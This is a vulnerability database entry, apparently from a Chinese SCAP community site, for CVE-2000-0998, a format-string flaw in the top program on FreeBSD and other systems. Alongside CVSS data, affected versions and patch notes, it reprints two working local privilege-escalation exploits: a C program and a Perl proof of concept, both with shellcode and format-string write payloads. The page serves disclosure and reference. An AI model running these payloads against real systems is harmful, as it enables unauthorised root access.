CVE-2000-0998
CVSS7.2
发布时间 :2000-12-11 00:00:00
修订时间 :2008-09-05 16:22:23
NMCOES    

[原文]Format string vulnerability in top program allows local attackers to gain root privileges via the "kill" or "renice" function.


[CNNVD]多厂商top格式化字符串漏洞(CNNVD-200012-011)

        top程序存在格式化字符串漏洞。本地攻击者可以借助“kill”或“renice”函数获取根权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:freebsd:freebsd:4.1.1FreeBSD 4.1.1
cpe:/o:freebsd:freebsd:3.5.1:release
cpe:/o:freebsd:freebsd:3.5.1FreeBSD 3.5.1
cpe:/o:freebsd:freebsd:3.5FreeBSD 3.5
cpe:/o:freebsd:freebsd:3.5:stable
cpe:/o:freebsd:freebsd:4.0:alpha
cpe:/o:freebsd:freebsd:3.5.1:stable
cpe:/o:freebsd:freebsd:4.0FreeBSD 4.0
cpe:/o:freebsd:freebsd:4.1FreeBSD 4.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0998
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0998
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200012-011
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1895
(VENDOR_ADVISORY)  BID  1895
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:62.top.v1.1.asc
(VENDOR_ADVISORY)  FREEBSD  FreeBSD-SA-00:62
ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.7/common/028_format_strings.patch
(UNKNOWN)  MISC  ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.7/common/028_format_strings.patch

- 漏洞信息

多厂商top格式化字符串漏洞
高危 格式化字符串
2000-12-11 00:00:00 2007-05-11 00:00:00
本地  
        top程序存在格式化字符串漏洞。本地攻击者可以借助“kill”或“renice”函数获取根权限。

- 公告与补丁

        FreeBSD has released patches for this vulnerability.
        The vendor has released version 3.5.1 of top to address this vulnerability.
        William LeFebvre top 1.0
        
        William LeFebvre top 1.2
        
        William LeFebvre top 1.3
        
        William LeFebvre top 1.4
        
        William LeFebvre top 1.5
        
        William LeFebvre top 1.6
        
        William LeFebvre top 1.7
        
        William LeFebvre top 1.8
        
        William LeFebvre top 2.0
        
        William LeFebvre top 2.0 pre
        
        William LeFebvre top 2.0.11
        
        William LeFebvre top 2.1
        
        William LeFebvre top 3.5
        
        FreeBSD FreeBSD 4.0
        

- 漏洞信息 (20377)

FreeBSD 3.5/4.x top Format String Vulnerability (EDBID:20377)
freebsd local
2000-11-01 Verified
0 truefinder
N/A [点击下载]
source: http://www.securityfocus.com/bid/1895/info

top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem so that it may read process information from kernel memory if executed by a user who does not have that privilege.

top contains a format-string vulnerability that may lead to a compromise of effective groupid kmem on BSD systems (or similar privileges on other systems). The problem occurs in the printing of error messages to a users terminal. A string partially composed of user input (the error message) is passed to a printf() function as the format string argument, allowing malicious format specifiers in user input to corrupt stack variables and execute arbitrary code.

If a malicious user gains egid kmem, vital information can be read from the kernel memory that may lead to a further elevation of privileges (most certainly root eventually). 

The versions of top that ships with FreeBSD prior to 4.2 are known to be vulnerable. It is likely that other systems are vulnerable (though none are confirmed yet).

/*
 * freebsd x86 top exploit
 * affected under top-3.5beta9 ( including this version )
 *
 * 1. get the address of .dtors from /usr/bin/top using objdump ,
 *
 *  'objdump -s -j .dtors /usr/bin/top'
 *
 * 2. divide it into four parts, and set it up into an environment variable like "XSEO="
 *
 * 3. run top, then find "your parted addresses from "kill" or "renice" command like this
 *
 *  'k %200$p' or 'r 2000 %200$p'
 *
 * 4. do exploit !
 *
 *  'k %190u%230$hn' <== 0xbf (4)
 *  'k %190u%229$hn' <== 0xbf (3)
 *  'k %214u%228$hn' <== 0xd7 (2)
 *  'k %118u%227$hn' <== 0x77 (1)
 *
 * truefinder , seo@igrus.inha.ac.kr
 * thx  mat, labman, zen-parse
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90
#define BUFSIZE 2048

char fmt[]=
"XSEO="
/* you would meet above things from 'k %200$p', it's confirming strings*/
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
/* .dtors's address in BSD*/
"\x08\xff\x04\x08"
"\x09\xff\x04\x08"
"\x0a\xff\x04\x08"
"\x0b\xff\x04\x08"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

/* might shellcode be located 0xbfbfd6? ~ 0xbfbfde? */

char sc[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80"; /* bigwaks 23 bytes shellcode */

int
main(void)
{
        char scbuf[BUFSIZE];
        char *scp;

        scp = (char*)scbuf;
        memset( scbuf, NOP, BUFSIZE );

        scp += ( BUFSIZE - strlen(sc) - 1);
        memcpy( scp, sc ,strlen(sc));

        scbuf[ BUFSIZE - 1] = '\0';

        memcpy( scbuf, "EGG=", 4);

        putenv(fmt);
        putenv(scbuf);

        system("/bin/bash");
}		

- 漏洞信息 (20378)

Debian GNU/Linux 3.1 top Format String Vulnerability (EDBID:20378)
linux local
2004-12-12 Verified
0 Kevin Finisterre
N/A [点击下载]
source: http://www.securityfocus.com/bid/1895/info
 
top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem so that it may read process information from kernel memory if executed by a user who does not have that privilege.
 
top contains a format-string vulnerability that may lead to a compromise of effective groupid kmem on BSD systems (or similar privileges on other systems). The problem occurs in the printing of error messages to a users terminal. A string partially composed of user input (the error message) is passed to a printf() function as the format string argument, allowing malicious format specifiers in user input to corrupt stack variables and execute arbitrary code.
 
If a malicious user gains egid kmem, vital information can be read from the kernel memory that may lead to a further elevation of privileges (most certainly root eventually).
 
The versions of top that ships with FreeBSD prior to 4.2 are known to be vulnerable. It is likely that other systems are vulnerable (though none are confirmed yet).

#!/usr/bin/perl 
# PoC for DMA[2005-0103a].txt
# Copyright Kevin Finisterre
# 12/12/2004
# William LeFebvre - unixtop 'kill' format string
# Tested on Debian GNU/Linux 3.1 with top compiled from 
# top-3.5.tar.gz
#
# This currently DOES NOT work outside of strace. 
# /tmp/sh is run for the time being. 

# offsets definately vary within gdb, strace and just plain top
# this is probably due to the use of the env for our write address
$fmt = "%.49149d.%180\$hn.%.15825d.%181\$hn";  # offset within strace

# The length of shellcode affects the offset for our %x's
# Obviously this is because the env is used to store the write address
$sc = "\x90" x (511-45) . # subtract shellcode len

# 45 bytes by anthema. 0xff less
"\x89\xe6"     . #                     /* movl %esp, %esi          */
"\x83\xc6\x30" . #                     /* addl $0x30, %esi         */
#"\xb8\x2e\x62\x69\x6e" . # /bin      /* movl $0x6e69622e, %eax   */
"\xb8\x2e\x74\x6D\x70" . # /tmp        /* movl $0x6e69622e, %eax   */
"\x40"         . #                     /* incl %eax                */
"\x89\x06"     . #                     /* movl %eax, (%esi)        */
"\xb8\x2e\x73\x68\x21" . # /sh           /* movl $0x2168732e, %eax   */
"\x40"         . #                    /* incl %eax                */
"\x89\x46\x04" . #                    /* movl %eax, 0x04(%esi)    */
"\x29\xc0"     . #                    /* subl %eax, %eax          */
"\x88\x46\x07" . #                    /* movb %al, 0x07(%esi)     */
"\x89\x76\x08" . #                    /* movl %esi, 0x08(%esi)    */
"\x89\x46\x0c" . #                    /* movl %eax, 0x0c(%esi)    */
"\xb0\x0b"     . #                     /* movb $0x0b, %al          */
"\x87\xf3"     . #                     /* xchgl %esi, %ebx         */
"\x8d\x4b\x08" . #                     /* leal 0x08(%ebx), %ecx    */
"\x8d\x53\x0c" . #                      /* leal 0x0c(%ebx), %edx    */
"\xcd\x80"; #                          /* int $0x80                */

$topcmd = "k $fmt";  # Use the top kill command

# Lazy hack to pass input to top. 
# Write to file "ex" and feed to top via < 
open(FILEH, ">ex") or die "sorry can't write cmd file.\n";
print FILEH $topcmd;

# Clear out the environment.
# Thanks John!
foreach $key (keys %ENV) {

    delete $ENV{$key};

}
# Is the env *really* clear when we run system()? 

# sprintf() is called after the new_message() call so lets overwrite it
# 0804f340 R_386_JUMP_SLOT   sprintf
$addr1 = "\x42\xf3\x04\x08";
$addr2 = "\x40\xf3\x04\x08";

# Digital Munitions R0x your b0x. 
# set up some padding, insert write addresses and follow up with shellcode
$ENV{"DMR0x"} = "AZZZZZZZ$addr1$addr2$sc";
$ENV{"TERM"} = "linux";
$ENV{"PATH"} = "/usr/local/bin:/usr/bin:/bin";

# Run top and feed it the file "ex" which contains the malicious kill command
# This saves us from typing like we had to do with Seo's exploit 
$topexec = "cat ex | strace -i ./top";
system($topexec);		

- 漏洞信息

12801
William LeFebvre top Multiple Function Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2000-10-06 Unknow
2000-10-06 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor top Format String Vulnerability
Input Validation Error 1895
No Yes
2000-11-01 12:00:00 2009-07-11 03:56:00
First published in FreeBSD advisory FreeBSD-SA-00:62 on Nov 1, 2000.

- 受影响的程序版本

William LeFebvre top 3.5
William LeFebvre top 2.1
William LeFebvre top 2.0.11
William LeFebvre top 2.0 pre
William LeFebvre top 2.0
William LeFebvre top 1.8
William LeFebvre top 1.7
William LeFebvre top 1.6
William LeFebvre top 1.5
William LeFebvre top 1.4
William LeFebvre top 1.3
William LeFebvre top 1.2
William LeFebvre top 1.0
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
FreeBSD FreeBSD 4.1.1
FreeBSD FreeBSD 4.1
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5 x
William LeFebvre top 3.5.1
FreeBSD FreeBSD 4.2

- 不受影响的程序版本

William LeFebvre top 3.5.1
FreeBSD FreeBSD 4.2

- 漏洞讨论

top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem so that it may read process information from kernel memory if executed by a user who does not have that privilege.

top contains a format-string vulnerability that may lead to a compromise of effective groupid kmem on BSD systems (or similar privileges on other systems). The problem occurs in the printing of error messages to a users terminal. A string partially composed of user input (the error message) is passed to a printf() function as the format string argument, allowing malicious format specifiers in user input to corrupt stack variables and execute arbitrary code.

If a malicious user gains egid kmem, vital information can be read from the kernel memory that may lead to a further elevation of privileges (most certainly root eventually).

The versions of top that ships with FreeBSD prior to 4.2 are known to be vulnerable. It is likely that other systems are vulnerable (though none are confirmed yet).

- 漏洞利用

The 'top-format-ex.c' exploit was contributed by SeungHyun Seo &lt;s1980914@inhavision.inha.ac.kr&gt; on 25 July, 2001.

The 'top_ex.pl' exploit was contributed by Kevin Finisterre on 12 Dec, 2004.

- 解决方案

FreeBSD has released patches for this vulnerability.

The vendor has released version 3.5.1 of top to address this vulnerability.


William LeFebvre top 1.0

William LeFebvre top 1.2

William LeFebvre top 1.3

William LeFebvre top 1.4

William LeFebvre top 1.5

William LeFebvre top 1.6

William LeFebvre top 1.7

William LeFebvre top 1.8

William LeFebvre top 2.0

William LeFebvre top 2.0 pre

William LeFebvre top 2.0.11

William LeFebvre top 2.1

William LeFebvre top 3.5

FreeBSD FreeBSD 4.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站